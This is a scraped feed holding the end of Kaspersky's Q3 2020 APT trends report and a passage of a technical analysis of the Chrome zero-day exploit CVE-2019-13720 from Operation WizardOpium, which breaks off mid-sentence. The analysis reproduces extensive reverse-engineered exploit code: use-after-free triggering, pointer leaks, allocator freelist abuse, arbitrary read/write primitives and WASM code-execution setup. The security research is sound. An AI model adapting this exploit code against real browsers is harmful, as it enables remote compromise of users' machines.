Africa. This tool was used to control public facing servers in those organizations by establishing a covert channel with a C2 server and passing shell commands and their outputs to the C2. This capability is facilitated using a Windows kernel mode driver. Use of the tool is part of an ongoing campaign that we have named TunnelSnake. The rootkit was detected on the targeted machines in May, with activity dating back as early as November 2019, persisting in networks for several months following the initial infection. We found another tool showing significant code overlaps with this rootkit, suggesting that the developers have been active since at least 2018. Since neither rootkit nor other lateral movement tools that accompanied it during the campaign relied on hard-coded C2 servers, we could gain only partial visibility into the attacker&#x27;s infrastructure. That said, the bulk of detected tools, apart from Moriya, consisted of both proprietary and well-known pieces of malware that were previously used by Chinese-speaking threat actors, giving a clue to the attacker&#x27;s origin.\n\nPlugX continues to be effectively and heavily used across Southeast and East Asia, and also Africa, with some minimal use in Europe. The PlugX codebase has been in use by multiple Chinese-speaking APT groups, including HoneyMyte, Cycldek and LuckyMouse. Government agencies, NGOs and IT service organizations seem to be consistent targets. While the new USB spreading capability is opportunistically pushing the malware throughout networks, compromised MSSPs/IT service organizations appear to be a potential vector of targeted delivery, with CobaltStrike installer packages pushed to multiple systems for initial PlugX installation. Based on our visibility, the majority of activity in the last quarter appears to be in Mongolia, Vietnam and Myanmar. The number of systems in these countries dealing with PlugX in 2020 is at the very least in the thousands.\n\nWe discovered an ongoing campaign, dating back to May, utilizing a new version of the Okrum backdoor, attributed to Ke3chang. This updated version of Okrum uses an Authenticode-signed Windows Defender binary using a unique side-loading technique. The attackers used steganography to conceal the main payload in the Defender executable while keeping its digital signature valid, reducing the chance of detection. We haven&#x27;t previously seen this method being used in the wild for malicious purposes. We have observed one affected victim, a telecoms company located in Europe.\n\nOn September 16, the [US Department of Justice released three indictments associated with hackers allegedly connected with APT41](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>) and other intrusion sets tracked as Barium, Winnti, Wicked Panda and Wicked Spider. In addition, two Malaysian nationals were also arrested on September 14, in Sitiawan (Malaysia), for &quot;conspiring to profit from computer intrusions targeting the video game industry&quot;, following cooperation between the US DoJ and the Malaysian government, including the Attorney General&#x27;s Chambers of Malaysia and the Royal Malaysia Police. The first indictment alleges that the defendants set up an elite &quot;white hat&quot; network security company, called Chengdu 404 Network Technology Co, Ltd. (aka Chengdu Si Lingsi Network Technology Co., Ltd.), and under its guise, engaged in computer intrusions targeting hundreds of companies around the world. According to the indictment, they &quot;carried out their hacking using specialized malware, such as malware that cyber-security experts named &#x27;PlugX/Fast&#x27;, &#x27;Winnti/Pasteboy&#x27;, &#x27;Shadowpad&#x27;, &#x27;Barlaiy/Poison Plug&#x27; and &#x27;Crosswalk/ProxIP'&quot;. The indictments contain several indirect IoCs, which allowed us to connect these intrusions to Operation ShadowPad and Operation ShadowHammer, two massive supply-chain attacks discovered and investigated by Kaspersky in recent years.\n\n## Middle East\n\nIn June, we observed new activity by the MuddyWater APT group, involving use of a new set of tools that constitute a multistage framework for loading malware modules. Some components of the framework leverage code to communicate with C2s identical to code we observed in the MoriAgent malware earlier this year. For this reason, we decided to dub the new framework MementoMori. The purpose of the new framework is to facilitate execution of further in-memory PowerShell or DLL modules. We detected high-profile victims based in Turkey, Egypt and Azerbaijan.\n\n## Southeast Asia and Korean Peninsula\n\nIn May, we found new samples belonging to the Dtrack family. The first sample, named Valefor, is an updated version of the Dtrack RAT containing a new feature enabling the attacker to execute more types of payload. The second sample is a keylogger called Camio which is an updated version of its keylogger. This new version updates the logged information and its storage mechanism. We observed signs indicating that these malware programs were tailored for specific victims. At the time of our research our telemetry revealed victims located in Japan.\n\nWe have been tracking LODEINFO, fileless malware used in targeted attacks since last December. During this time, we observed several versions as the authors were developing the malware. In May, we detected version v0.3.6 targeting diplomatic organizations located in Japan. Shortly after that, we detected v0.3.8 as well. Our investigation revealed how the attackers operate during the lateral movement stage: after obtaining the desired data, the attackers wipe their traces. Our private report included a technical analysis of the LODEINFO malware and the attack sequence in the victim&#x27;s network, to disclose the actor&#x27;s tactics and methods.\n\nWhile tracking Transparent Tribe activity, we discovered an interesting tool used by this APT threat actor: the server component used to manage CrimsonRAT bots. We found different versions of this software, allowing us to look at the malware from the perspective of the attackers. It shows that the main purpose of this tool is file stealing, given its functionalities for exploring the remote file system and collecting files using specific filters. Transparent Tribe (aka PROJECTM and MYTHIC LEOPARD) is a very prolific APT group that has increased its activities in recent months. We reported [the launch of a new wide-ranging campaign that uses the CrimsonRAT tool](<https://securelist.com/transparent-tribe-part-1/98127/>) where we were able to set up and analyze the server component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom &amp; Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. We believe that the same organization was probably the same target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here ](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. While the infection mechanism remains the same as before, including the group&#x27;s exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT, warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it&#x27;s not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the &quot;traceroute&quot; command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan&#x27;s government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven&#x27;t been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such (COVID-19) to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, MosiacRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we&#x27;ve seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the &#x27;naming and shaming&#x27; of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker is a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n \t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 millseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray&lt;double&gt; type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0****, **it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. The exploit sets the exported WASM function to be 